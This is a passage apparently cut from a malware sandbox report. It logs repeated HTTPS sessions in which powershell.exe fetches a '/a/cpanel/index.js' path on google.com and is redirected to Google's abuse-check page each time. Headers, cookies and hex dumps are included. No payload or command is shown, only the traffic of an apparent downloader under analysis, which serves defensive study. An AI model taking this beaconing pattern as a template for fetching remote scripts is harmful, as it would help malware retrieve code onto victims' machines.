2024-12-17 07:11:03 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D3e51fb191164bd69:TM%3D1734419460:C%3D%3E:IP%3D8.46.123.189-:S%3D5Uki4wdjnMQjEotGwg41DQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:00+GMT Date: Tue, 17 Dec 2024 07:11:03 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:03 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 33 65 35 31 66 62 31 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D3e51fb1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49869	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:05 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D3e51fb191164bd69:TM%3D1734419460:C%3D%3E:IP%3D8.46.123.189-:S%3D5Uki4wdjnMQjEotGwg41DQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:00+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:06 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:06 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=3e51fb191164bd69:TM=1734419460:C=>:IP=8.46.123.189-:S=5Uki4wdjnMQjEotGwg41DQ; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:00 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:06 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49880	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:08 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:09 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGIjB3f8ZlXwQ9EDNrSunHscCKBtjTBi04vtVAdXQzDTijOe7a5EnVZtF_3mYyMP0B8vkyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:09 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:09 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49889	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:11 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGIjB3f8ZlXwQ9EDNrSunHscCKBtjTBi04vtVAdXQzDTijOe7a5EnVZtF_3mYyMP0B8vkyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:12 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D06204dc2df8d40ca:TM%3D1734419468:C%3D%3E:IP%3D8.46.123.189-:S%3DjzlCUfG7gCKx5jCgjFJ3Jg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:08+GMT Date: Tue, 17 Dec 2024 07:11:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:12 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 30 36 32 30 34 64 63 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D06204dc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49896	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:13 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D06204dc2df8d40ca:TM%3D1734419468:C%3D%3E:IP%3D8.46.123.189-:S%3DjzlCUfG7gCKx5jCgjFJ3Jg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:08+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:14 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:14 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=06204dc2df8d40ca:TM=1734419468:C=>:IP=8.46.123.189-:S=jzlCUfG7gCKx5jCgjFJ3Jg; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:08 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:14 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49904	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:16 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:17 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJXIhLsGIjDLabiJ-QiwsZEXYTtbpyHougaNin6iQvUlvUHrndvdIUDrbCCQ_csi8ctFk-RARRoyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:17 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:17 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49913	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:19 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJXIhLsGIjDLabiJ-QiwsZEXYTtbpyHougaNin6iQvUlvUHrndvdIUDrbCCQ_csi8ctFk-RARRoyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:20 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De0ca2cab5d4c45d9:TM%3D1734419477:C%3D%3E:IP%3D8.46.123.189-:S%3DwATdkq_W8-ar7MUn7LlZgQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:17+GMT Date: Tue, 17 Dec 2024 07:11:19 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:20 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 65 30 63 61 32 63 61 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De0ca2ca

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49922	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:21 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De0ca2cab5d4c45d9:TM%3D1734419477:C%3D%3E:IP%3D8.46.123.189-:S%3DwATdkq_W8-ar7MUn7LlZgQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:17+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:23 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:22 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=e0ca2cab5d4c45d9:TM=1734419477:C=>:IP=8.46.123.189-:S=wATdkq_W8-ar7MUn7LlZgQ; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:17 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:23 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49932	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:24 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:25 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGIjBeq4R7hduOCFk6MqmpybyFegkVqEIli4aSEr98237Hfu-HLjsSgltSEthFM-9uyK8yBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:25 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:25 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49941	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:27 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGIjBeq4R7hduOCFk6MqmpybyFegkVqEIli4aSEr98237Hfu-HLjsSgltSEthFM-9uyK8yBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:28 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Deaae9950a8608d92:TM%3D1734419485:C%3D%3E:IP%3D8.46.123.189-:S%3D2pcgQWWhP7vXzFpnkNXuvQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:25+GMT Date: Tue, 17 Dec 2024 07:11:28 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:28 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 65 61 61 65 39 39 35 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Deaae995

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49949	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:30 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Deaae9950a8608d92:TM%3D1734419485:C%3D%3E:IP%3D8.46.123.189-:S%3D2pcgQWWhP7vXzFpnkNXuvQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:25+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:31 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:31 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=eaae9950a8608d92:TM=1734419485:C=>:IP=8.46.123.189-:S=2pcgQWWhP7vXzFpnkNXuvQ; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:25 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:31 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
